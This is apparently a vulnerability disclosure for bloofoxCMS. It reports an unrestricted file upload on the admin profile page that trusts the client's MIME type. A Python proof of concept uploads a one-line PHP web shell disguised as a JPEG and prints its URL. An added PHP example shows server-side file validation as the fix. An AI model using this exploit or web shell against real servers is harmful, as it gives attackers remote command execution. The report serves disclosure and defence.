I found an Unrestricted File Upload in `http://localhost/bloofoxCMS/admin/index.php?mode=user&action=profile&userid=[ID]` -> `filename` param; the `filename` param only checks the MIME type, which can be bypassed.
PoC :-

```python
import requests

sid = 'xxxxxxxxxxxxxxxxxxxxxxxxxx'  # The Admin Session
url = "http://localhost/bloofoxCMS/bloofoxCMS/admin/index.php?page=myprofile"
data = {'username': 'admin', 'send': 'Save'}
r = requests.post(url, data=data, headers={'Cookie': 'sid=' + sid + ';'}, files={'filename': ('texst.php', "<?=`$_GET[1]`;", 'image/jpeg')}).text.split('/media/images/profiles/')[1].split("'")[0]
print('Your Shell in http://localhost/bloofoxCMS//admin/media/images/profiles/' + r)
```

Impact
Uploading backdoor PHP files, which leads to control of the victim web server.
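
A server-side check that does not rely on the request's Content-Type, as an added example (not bloofoxCMS code and not part of the original report). The function name, the allowlist and the sample files are assumptions constructed for illustration:

```php
<?php
// Added illustration, not bloofoxCMS code. Names and allowlist are assumptions.
const ALLOWED_IMAGES = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

/**
 * Returns a server-generated file name for an acceptable profile image,
 * or null to reject. $_FILES[...]['type'] is never consulted: it is copied
 * from the request and is whatever the client chose to send.
 */
function safe_profile_image_name(string $tmpPath, string $clientName): ?string
{
    // 1. Derive the type from the file's bytes.
    $detected = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($detected === false || !array_key_exists($detected, ALLOWED_IMAGES)) {
        return null;
    }
    // 2. The bytes must also parse as an image.
    if (@getimagesize($tmpPath) === false) {
        return null;
    }
    // 3. The client's extension must agree with the detected type.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    $ext = ($ext === 'jpeg') ? 'jpg' : $ext;
    if ($ext !== ALLOWED_IMAGES[$detected]) {
        return null;
    }
    // 4. Never store under the client's name; the extension comes from the allowlist.
    return bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGES[$detected];
}

// Constructed sample files (not taken from the report).
$script = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($script, "<?php echo 'constructed sample'; ?>");
$gif = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($gif, base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7'));

var_dump(safe_profile_image_name($script, 'avatar.php')); // script content
var_dump(safe_profile_image_name($gif, 'avatar.php'));    // real image, .php name
var_dump(safe_profile_image_name($gif, 'avatar.gif'));    // real image, matching name

// In a real handler, check $_FILES['filename']['error'] === UPLOAD_ERR_OK first and
// store the file with move_uploaded_file($tmpPath, $uploadDir . '/' . $name).
unlink($script);
unlink($gif);
```

Keeping the profile image directory out of the PHP handler's scope in the web server configuration remains a separate layer, since a file can carry valid image headers and still contain script text.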